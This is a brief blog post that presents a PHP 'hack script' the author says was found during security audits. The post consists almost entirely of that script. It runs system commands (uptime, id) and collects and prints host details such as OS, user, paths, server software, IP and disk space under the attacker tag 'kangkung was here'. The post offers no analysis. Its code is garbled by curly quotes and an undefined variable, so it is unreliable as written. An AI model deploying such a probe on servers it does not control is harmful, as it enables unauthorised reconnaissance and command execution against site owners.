Some Hack Script

After my fare share of performing security audit, these are some hacking script I found, not for the purpose of hacking, but for education, analysis and prevention.
 function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "kangkung “; $un = @php_uname(); $up = system(uptime); $id1 = system(id); $pwd1 = @getcwd(); $sof1 = getenv(“SERVER_SOFTWARE”); $php1 = phpversion(); $name1 = $_SERVER[‘SERVER_NAME’]; $ip1 = gethostbyname($SERVER_ADDR); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo “kangkung was here .. “; echo “uname -a: $un “; echo “os: $os “; echo “uptime: $up “; echo “id: $id1 “; echo “pwd: $pwd1 “; echo “php: $php1 “; echo “software: $sof1 “; echo “server-name: $name1 “; echo “server-ip: $ip1 “; echo “free: $free “; echo “used: $used “; echo “total: $all “; exit;

Some Hack Script

Comments

Leave a Reply Cancel reply